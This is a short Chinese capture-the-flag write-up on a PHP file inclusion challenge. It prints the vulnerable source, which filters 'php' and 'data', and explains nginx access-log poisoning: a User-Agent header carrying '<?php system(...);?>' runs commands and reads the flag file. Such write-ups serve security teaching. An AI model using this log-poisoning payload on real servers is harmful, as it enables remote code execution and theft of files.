本文介绍了一种通过利用日志文件包含漏洞进行攻击的方法。通过修改GET参数中的文件路径为服务器的日志文件路径,可以读取敏感信息。进一步尝试通过User-Agent头注入PHP代码执行命令,但实际应用中可能需要多次尝试才能成功。
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
过滤了php,data,其他伪协议都用不了
考虑用日志文件包含
GET
?file=/var/log/nginx/access.log
User-Agent
<?php system('ls');?>
可能要发几次才能出来
然后再换
<?php system('cat fl0g.php');?>
但页面上 仍然没有flag,查看源代码
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
